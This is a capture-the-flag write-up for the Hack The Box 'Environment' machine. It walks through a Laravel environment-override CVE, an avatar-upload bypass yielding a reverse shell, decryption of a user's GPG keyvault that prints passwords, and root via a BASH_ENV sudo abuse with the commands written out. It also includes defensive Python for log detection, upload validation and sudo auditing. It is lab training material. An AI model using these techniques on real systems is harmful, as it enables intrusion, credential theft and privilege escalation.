Hackthebox: Environment

Foued SAIDI

Overview

Environment is a medium-difficulty machine from Hack The Box. It starts with a broken Laravel PHP application that mishandles errors, allowing us to uncover a hidden endpoint vulnerable to CVE-2024-52301; from there we exploit a file upload vulnerability (CVE-2024-21546) to get a shell on the system. Some GnuPG keyvault abuse then lets us exfiltrate credentials, and finally we abuse the systeminfo binary to get root access.

Environment-info-card

Reconnaissance

PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey:
| 256 5c:02:33:95:ef:44:e2:80:cd:3a:96:02:23:f1:92:64 (ECDSA)
|_ 256 1f:3d:c2:19:55:28:a1:77:59:51:48:10:c4:4b:74:ab (ED25519)
80/tcp open http nginx 1.22.1
|_http-server-header: nginx/1.22.1
|_http-title: Did not follow redirect to http://environment.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nothing too interesting here: SSH is exposed on port 22, and the web application on port 80 redirects us to environment.htb, so we add that entry to our /etc/hosts file.

Web Application - http://environment.htb

Wappalyzer

We can see from the Wappalyzer tab that the web app is using Laravel.
Let's make a simple authentication request and mess with the parameters to see if we can trigger some sort of error:

Authentication

We do get an error. Specifically, the $keep_loggedin !== False branch has no logic behind it, so let's supply a random value in the remember-me field and see what new error we get:

Authentication

Here we can see that we can access management through preprod.
Checking for related security vulnerabilities, we find CVE-2024-52301, which allows us to submit a preprod environment variable and directly access the preprod environment:

Preprod

And we can indeed:

Preprod

Preprod
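From the defender's side, the tell-tale sign of CVE-2024-52301 in web-server logs is a query-string key that looks like a command-line option (it starts with "--"), which no browser sends on its own. The following Python is an added example, not part of this write-up or of Laravel: it parses constructed nginx combined-format log lines and flags any request whose query string carries such keys (the sample lines, IPs and timestamps are made up).

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in nginx "combined" log format; not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Sep/2025:14:32:41 +0000] "GET /login HTTP/1.1" 200 1203 "-" "Mozilla/5.0"
10.0.0.5 - - [06/Sep/2025:14:32:44 +0000] "POST /login HTTP/1.1" 302 358 "-" "Mozilla/5.0"
10.0.0.9 - - [06/Sep/2025:14:33:02 +0000] "GET /login?--env=preprod HTTP/1.1" 200 1450 "-" "curl/8.5.0"
10.0.0.9 - - [06/Sep/2025:14:33:10 +0000] "GET /management/info?page=2 HTTP/1.1" 302 358 "-" "curl/8.5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

def argv_style_keys(target: str) -> list[str]:
    """Return query-string keys that look like command-line options ('--...').

    A browser never sends such keys; in the vulnerable Laravel versions the
    framework treated them as argv options during environment detection.
    """
    query = urlsplit(target).query
    return [k for k, _ in parse_qsl(query, keep_blank_values=True) if k.startswith("--")]

def find_env_override_attempts(log_text: str) -> list[dict]:
    """Scan access-log text and report every request carrying '--' style keys."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        keys = argv_style_keys(m["target"])
        if keys:
            hits.append({"ip": m["ip"], "ts": m["ts"], "target": m["target"], "keys": keys})
    return hits

if __name__ == "__main__":
    for h in find_env_override_attempts(SAMPLE_LOG):
        print(f"{h['ts']} {h['ip']} {h['target']} suspicious keys={h['keys']}")
```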

Now, doing some enumeration on it, we find an info endpoint:

PS C:\Users\0xkujen\Desktop\Tools> feroxbuster -u http://environment.htb/management/ -w .\SecLists-master\Discovery\Web-Content\common.txt -C 404,403

by Ben "epi" Risher 🤓 ver: 2.8.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://environment.htb/management/
🚀 Threads │ 50
📖 Wordlist │ .\SecLists-master\Discovery\Web-Content\common.txt
💢 Status Code Filters │ [404, 403]
💥 Timeout (secs) │ 7
🦑 User-Agent │ feroxbuster/2.8.0
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
WLD - - - - http://environment.htb/management/.git/logs/ => auto-filtering 404-like response (153 bytes); toggle this behavior by using --dont-filter
302 GET 12l 22w 358c http://environment.htb/management/dashboard => http://environment.htb/login
302 GET 12l 22w 358c http://environment.htb/management/info => http://environment.htb/login
302 GET 12l 22w 358c http://environment.htb/management/profile => http://environment.htb/login
[####################] - 2m 14241/14241 0s found:3 errors:0
[####################] - 2m 4751/4747 37/s http://environment.htb/management/
[####################] - 1m 4751/4747 40/s http://environment.htb/management/.git/logs/
[####################] - 1m 4751/4747 47/s http://environment.htb/management/.git/logs/cgi-bin/

This leaks the PHP info page, which isn't that useful for now.

Checking other features, we find that we can upload an avatar picture. That feature relies on the unisharp/laravel-filemanager package, which in this case is vulnerable to CVE-2024-21546, so we can:
1- upload shell.php
2- (now on the request):
2.1 change its name to shell.php.
2.2 add GIF8 at the beginning
2.3 and boom, we get our shell back.
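The two tricks above work because the upload check trusts the client-supplied file name and only looks at a four-byte prefix. As an added example (not code from this write-up or from laravel-filemanager), here is the shape of a validator that closes both gaps: it refuses trailing dots and non-image extensions, demands a complete image signature, and then throws the client name away in favour of a random, content-derived one. Function and exception names are my own.

```python
import os
import secrets

# Full magic-byte signatures we accept, mapped to the extension WE assign.
# A bare 'GIF8' prefix (as used in the bypass above) does not match any of them.
SIGNATURES = {
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
    b"\x89PNG\r\n\x1a\n": ".png",
    b"\xff\xd8\xff": ".jpg",
}
ALLOWED_EXT = {".gif", ".png", ".jpg", ".jpeg"}

class UploadRejected(ValueError):
    pass

def safe_avatar_name(client_name: str, data: bytes) -> str:
    """Validate an avatar upload and return a random, server-chosen file name.

    The client-supplied name is only used for validation; it never becomes
    the stored name, so tricks such as 'shell.php.' cannot survive storage.
    """
    base = os.path.basename(client_name)
    if base != client_name or base in ("", ".", ".."):
        raise UploadRejected("path components not allowed")
    if base != base.rstrip(". "):
        raise UploadRejected("trailing dot or space in file name")
    # Every extension of a multi-extension name must be an image extension,
    # so 'avatar.php.gif' is refused instead of being normalised to .php later.
    parts = base.lower().split(".")[1:]
    if not parts or any("." + p not in ALLOWED_EXT for p in parts):
        raise UploadRejected("extension not allowed")
    ext = next((e for sig, e in SIGNATURES.items() if data.startswith(sig)), None)
    if ext is None:
        raise UploadRejected("content is not a recognised image")
    # Defence in depth only: the real protection is the random name plus an
    # upload directory that the web server never hands to the PHP interpreter.
    if b"<?php" in data or b"<?=" in data:
        raise UploadRejected("PHP open tag inside image data")
    return secrets.token_hex(16) + ext

def is_accepted(client_name: str, data: bytes) -> bool:
    """True if the upload would be stored, False if any check rejects it."""
    try:
        safe_avatar_name(client_name, data)
        return True
    except UploadRejected:
        return False
```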

PS C:\Users\0xkujen> nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.31] from (UNKNOWN) [10.10.11.67] 48460
Linux environment 6.1.0-34-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.135-1 (2025-04-25) x86_64 GNU/Linux
03:51:28 up 23:50, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$

Looking at the user's home folder, we find an interesting keyvault file:

$ ls -al
total 12
drwxr-xr-x 2 hish hish 4096 Jan 12 11:49 .
drwxr-xr-x 5 hish hish 4096 Apr 11 00:51 ..
-rw-r--r-- 1 hish hish 430 May 15 03:54 keyvault.gpg
$ ls -al ..
total 36
drwxr-xr-x 5 hish hish 4096 Apr 11 00:51 .
drwxr-xr-x 3 root root 4096 Jan 12 11:51 ..
lrwxrwxrwx 1 root root 9 Apr 7 19:29 .bash_history -> /dev/null
-rw-r--r-- 1 hish hish 220 Jan 6 21:28 .bash_logout
-rw-r--r-- 1 hish hish 3526 Jan 12 14:42 .bashrc
drwxr-xr-x 4 hish hish 4096 May 15 03:54 .gnupg
drwxr-xr-x 3 hish hish 4096 Jan 6 21:43 .local
-rw-r--r-- 1 hish hish 807 Jan 6 21:28 .profile
drwxr-xr-x 2 hish hish 4096 Jan 12 11:49 backup
-rw-r--r-- 1 root hish 33 May 14 04:03 user.txt
$

We can decrypt it using the contents of the .gnupg folder:

$ cp -R /home/hish/.gnupg .
$ cp /home/hish/backup/keyvault.gpg
cp: missing destination file operand after '/home/hish/backup/keyvault.gpg'
Try 'cp --help' for more information.
$ cp /home/hish/backup/keyvault.gpg .
$ GNUPGHOME=/tmp/.gnupg gpg --decrypt keyvault.gpg
gpg: encrypted with 2048-bit RSA key, ID B755B0EDD6CFCFD3, created 2025-01-11
"hish_ <[email protected]>"
PAYPAL.COM -> Ihaves0meMon$yhere123
ENVIRONMENT.HTB -> marineSPm@ster!!
FACEBOOK.COM -> summerSunnyB3ACH!!
$

We can now SSH in as hish with the ENVIRONMENT.HTB password and grab the user flag.

Privilege Escalation - systeminfo abuse

Looking at what the hish user can execute as root:

hish@environment:~$ sudo -l
[sudo] password for hish:
Matching Defaults entries for hish on environment:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
env_keep+="ENV BASH_ENV", use_pty

User hish may run the following commands on environment:
(ALL) /usr/bin/systeminfo
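The weak spot in this sudo configuration is the env_keep+="ENV BASH_ENV" directive, which undoes env_reset for every command hish may run. As an added example (not from this write-up), the Python below parses sudo -l output of this shape, extracts the kept variables and the allowed commands, and reports the kept variables that let a caller alter a sudo-run program before it starts; the sample text is constructed from the output above.

```python
import re

# Variables that change how a program behaves before its first instruction runs.
# Letting sudo keep any of them nullifies env_reset for every allowed command.
RISKY_ENV = {
    "BASH_ENV", "ENV", "LD_PRELOAD", "LD_LIBRARY_PATH", "PERL5OPT", "PERL5LIB",
    "PYTHONPATH", "PYTHONSTARTUP", "RUBYLIB", "RUBYOPT", "PS4", "SHELLOPTS",
}

# Constructed from the 'sudo -l' output shown above (raw string: sudo prints
# the escaped colons in secure_path literally).
SUDO_L_OUTPUT = r"""Matching Defaults entries for hish on environment:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    env_keep+="ENV BASH_ENV", use_pty

User hish may run the following commands on environment:
    (ALL) /usr/bin/systeminfo
"""

# Matches env_keep="A B", env_keep+="A B" and the unquoted single-variable forms.
ENV_KEEP_RE = re.compile(r'env_keep\s*\+?=\s*"?([^",\n]+)"?')
# Command lines look like "(runas) /path/to/cmd".
CMD_RE = re.compile(r'^\s*\((?P<runas>[^)]*)\)\s+(?P<cmd>\S.*?)\s*$', re.MULTILINE)

def kept_env_vars(text: str) -> set[str]:
    """Every variable named in an env_keep / env_keep+= directive."""
    kept: set[str] = set()
    for m in ENV_KEEP_RE.finditer(text):
        kept.update(m.group(1).split())
    return kept

def allowed_commands(text: str) -> list[tuple[str, str]]:
    """(runas, command) pairs listed under 'may run the following commands'."""
    return [(m["runas"], m["cmd"]) for m in CMD_RE.finditer(text)]

def audit_sudo_defaults(text: str) -> list[str]:
    """Kept variables that let the caller hijack a sudo-run command, sorted.

    Remediation: drop them from env_keep, or scope them to the one rule that
    really needs them instead of granting them to every command.
    """
    return sorted(kept_env_vars(text) & RISKY_ENV)

if __name__ == "__main__":
    risky = audit_sudo_defaults(SUDO_L_OUTPUT)
    for runas, cmd in allowed_commands(SUDO_L_OUTPUT):
        print(f"{cmd} (as {runas}): {'AT RISK' if risky else 'ok'} kept={risky}")
```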

A simple abuse is to first create a shell file (saved as /tmp/shell):

#!/bin/bash
chmod +s /bin/bash

Then, since sudo keeps BASH_ENV thanks to the env_keep entry above, we set it to our script and get root access via this command:

sudo BASH_ENV=/tmp/shell /usr/bin/systeminfo

Then just type bash -p and you'll find yourself in a root shell :)

That was it for Environment, happy hacking!
-0xkujen

  • Title: Hackthebox: Environment
  • Author: Foued SAIDI
  • Created at : 2025-09-06 14:32:41
  • Updated at : 2025-09-06 15:01:05
  • Link: https://kujen5.github.io/2025/09/06/Hackthebox-Environment/
  • License: This work is licensed under CC BY-NC-SA 4.0.